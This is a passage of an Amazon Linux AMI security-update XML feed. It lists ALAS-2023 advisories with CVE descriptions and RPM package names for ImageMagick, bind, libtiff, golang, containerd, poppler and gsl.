arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.164.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.164.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.164.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.164.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1844</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1844: medium priority package update for ImageMagick</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-34151:
A vulnerability was found in ImageMagick. This issue occurs as an undefined behavior, casting double to size_t in svg, mvg and other coders.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151" title="" id="CVE-2023-34151" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-perl" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1845</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1845: important priority package update for bind</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3341:
The code that processes control channel messages sent to `named` calls certain functions recursively during packet parsing. Recursion depth is only limited by the maximum accepted packet size; depending on the environment, this may cause the packet-parsing code to run out of available stack memory, causing `named` to terminate unexpectedly. Since each incoming control channel message is fully parsed before its contents are authenticated, exploiting this flaw does not require the attacker to hold a valid RNDC key; only network access to the control channel's configured TCP port is necessary.
This issue affects BIND 9 versions 9.2.0 through 9.16.43, 9.18.0 through 9.18.18, 9.19.0 through 9.19.16, 9.9.3-S1 through 9.16.43-S1, and 9.18.0-S1 through 9.18.18-S1.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3341" title="" id="CVE-2023-3341" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1846</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1846: medium priority package update for libtiff</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3316:
A NULL pointer dereference in TIFFClose() is caused by a failure to open an output file (non-existent path or a path that requires permissions like /dev/null) while specifying zones.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3316" title="" id="CVE-2023-3316" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-static" version="4.0.3" release="35.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.46.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.46.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.46.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.46.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.46.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.46.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.46.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.46.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.46.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.46.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.46.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1847</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1847: medium priority package update for libtiff</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-30774:
A vulnerability was found in libtiff library. This security flaw causes a heap buffer overflow issue via TIFFTAG_INKNAMES and TIFFTAG_NUMBEROFINKS values.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30774" title="" id="CVE-2023-30774" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="35.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.47.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.47.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.47.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.47.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.47.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.47.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.47.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.47.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.47.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.47.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.47.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1848</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1848: important priority package update for golang</title><issued date="2023-09-27 22:15:00" /><updated date="2024-01-03 22:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-39319:
The html/template package does not apply the proper rules for handling occurrences of "<script", "<!--", and "</script" within JS literals in <script> contexts. This may cause the template parser to improperly consider script contexts to be terminated early, causing actions to be improperly escaped. This could be leveraged to perform an XSS attack.
CVE-2023-29409:
Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures. With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits. Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable.
CVE-2023-29406:
The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.
CVE-2023-29405:
The go command may execute arbitrary code at build time when using cgo. This may occur when running "go get" on a malicious module, or when running any other command which builds untrusted code. This is can by triggered by linker flags, specified via a "#cgo LDFLAGS" directive. Flags containing embedded spaces are mishandled, allowing disallowed flags to be smuggled through the LDFLAGS sanitization by including them in the argument of another flag. This only affects usage of the gccgo compiler.
CVE-2023-29404:
The go command may execute arbitrary code at build time when using cgo. This may occur when running "go get" on a malicious module, or when running any other command which builds untrusted code. This is can by triggered by linker flags, specified via a "#cgo LDFLAGS" directive. The arguments for a number of flags which are non-optional are incorrectly considered optional, allowing disallowed flags to be smuggled through the LDFLAGS sanitization. This affects usage of both the gc and gccgo compilers.
CVE-2023-29403:
On Unix platforms, the Go runtime does not behave differently when a binary is run with the setuid/setgid bits. This can be dangerous in certain cases, such as when dumping memory state, or assuming the status of standard i/o file descriptors. If a setuid/setgid binary is executed with standard I/O file descriptors closed, opening any files can result in unexpected content being read or written with elevated privileges. Similarly, if a setuid/setgid program is terminated, either via panic or signal, it may leak the contents of its registers.
CVE-2023-29400:
html/template: improper handling of empty HTML attributes.
Templates containing actions in unquoted HTML attributes (e.g. "attr={{.}}") executed with empty input could result in output that would have unexpected results when parsed due to HTML normalization rules. This may allow injection of arbitrary attributes into tags.
CVE-2023-24540:
html/template: improper handling of JavaScript whitespace.
Not all valid JavaScript whitespace characters were considered to be whitespace. Templates containing whitespace characters outside of the character set "\t\n\f\r\u0020\u2028\u2029" in JavaScript contexts that also contain actions may not be properly sanitized during execution.
CVE-2023-24538:
Templates did not properly consider backticks (`) as Javascript string delimiters, and as such did
not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template
contained a Go template action within a Javascript template literal, the contents of the action could
be used to terminate the literal, injecting arbitrary Javascript code into the Go template.
CVE-2023-24537:
Calling any of the Parse functions on Go source code which contains //line directives with very large line numbers can cause an infinite loop due to integer overflow.
CVE-2023-24532:
The ScalarMult and ScalarBaseMult methods of the P256 Curve may return an incorrect result if called with some specific unreduced scalars (a scalar larger than the order of the curve). This does not impact usages of crypto/ecdsa or crypto/ecdh.
CVE-2022-41725:
Golang: net/http, mime/multipart: denial of service from excessive resource consumption (https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E)
CVE-2022-41724:
Large handshake records may cause panics in crypto/tls. Both clients and servers may send large TLS handshake records which cause servers and clients, respectively, to panic when attempting to construct responses. This affects all TLS 1.3 clients, TLS 1.2 clients which explicitly enable session resumption (by setting Config.ClientSessionCache to a non-nil value), and TLS 1.3 servers which request client certificates (by setting Config.ClientAuth >= RequestClientCert).
CVE-2022-41722:
The Go project has described this issue as follows:
"On Windows, the filepath.Clean function could transform an invalid path such as a/../c:/b into the valid path c:\b. This transformation of a relative (if invalid) path into an absolute path could enable a directory traversal attack. The filepath.Clean function will now transform this path into the relative (but still invalid) path .\c:\b."
CVE-2022-41717:
An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717" title="" id="CVE-2022-41717" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41722" title="" id="CVE-2022-41722" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41724" title="" id="CVE-2022-41724" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41725" title="" id="CVE-2022-41725" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24532" title="" id="CVE-2023-24532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24537" title="" id="CVE-2023-24537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24538" title="" id="CVE-2023-24538" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24540" title="" id="CVE-2023-24540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29400" title="" id="CVE-2023-29400" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29403" title="" id="CVE-2023-29403" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29404" title="" id="CVE-2023-29404" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29405" title="" id="CVE-2023-29405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29406" title="" id="CVE-2023-29406" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29409" title="" id="CVE-2023-29409" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39319" title="" id="CVE-2023-39319" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-misc" version="1.20.8" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.20.8-1.47.amzn1.noarch.rpm</filename></package><package name="golang-shared" version="1.20.8" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.20.8-1.47.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.20.8" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.20.8-1.47.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.20.8" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.20.8-1.47.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.20.8" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.20.8-1.47.amzn1.noarch.rpm</filename></package><package name="golang" version="1.20.8" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.20.8-1.47.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.20.8" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.20.8-1.47.amzn1.noarch.rpm</filename></package><package name="golang" version="1.20.8" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.20.8-1.47.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.20.8" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.20.8-1.47.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.20.8" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.20.8-1.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1849</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1849: important priority package update for containerd</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-29409:
Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures. With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits. Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable.
CVE-2023-29406:
The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.
CVE-2022-41723:
http2/hpack: avoid quadratic complexity in hpack decoding
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723" title="" id="CVE-2022-41723" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29406" title="" id="CVE-2023-29406" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29409" title="" id="CVE-2023-29409" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-debuginfo" version="1.4.13" release="5.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.13-5.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.13" release="5.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.13-5.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.13" release="5.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.13-5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1850</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1850: medium priority package update for poppler</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-38349:
An issue was discovered in Poppler 22.08.0. There is a reachable assertion in Object.h, will lead to denial of service because PDFDoc::replacePageDict in PDFDoc.cc lacks a stream check before saving an embedded file.
CVE-2020-36024:
An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::convertToType1 function.
CVE-2020-36023:
An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::cvtGlyph function.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36023" title="" id="CVE-2020-36023" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36024" title="" id="CVE-2020-36024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38349" title="" id="CVE-2022-38349" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-glib" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-43.26.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-43.26.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.26.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-43.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1851</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1851: medium priority package update for gsl</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-35357:
A buffer overflow can occur when calculating the quantile value using the Statistics Library of GSL (GNU Scientific Library), versions 2.5 and 2.6. Processing a maliciously crafted input data for gsl_stats_quantile_from_sorted_data of the library may lead to unexpected application termination or arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35357" title="" id="CVE-2020-35357" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gsl-debuginfo" version="1.13" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/gsl-debuginfo-1.13-4.4.amzn1.x86_64.rpm</filename></package><package name="gsl-static" version="1.13" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/gsl-static-1.13-4.4.amzn1.x86_64.rpm</filename></package><package name="gsl-devel" version="1.13" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/gsl-devel-1.13-4.4.amzn1.x86_64.rpm</filename></package><package name="gsl" version="1.13" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/gsl-1.13-4.4.amzn1.x86_64.rpm</filename></package><package name="gsl-debuginfo" version="1.13" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/gsl-debuginfo-1.13-4.4.amzn1.i686.rpm</filename></package><package name="gsl" version="1.13" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/gsl-1.13-4.4.amzn1.i686.rpm</filename></package><package name="gsl-static" version="1.13" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/gsl-static-1.13-4.4.amzn1.i686.rpm</filename></package><package name="gsl-devel" version="1.13" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/gsl-devel-1.13-4.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1852</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1852: medium priority package update for poppler</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-23804:
Uncontrolled Recursion in pdfinfo, and pdftops in poppler 0.89.0 allows remote attackers to cause a denial of service via crafted input.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23804" title="" id="CVE-2020-23804" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-glib-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.27.amzn1" epoch="0" 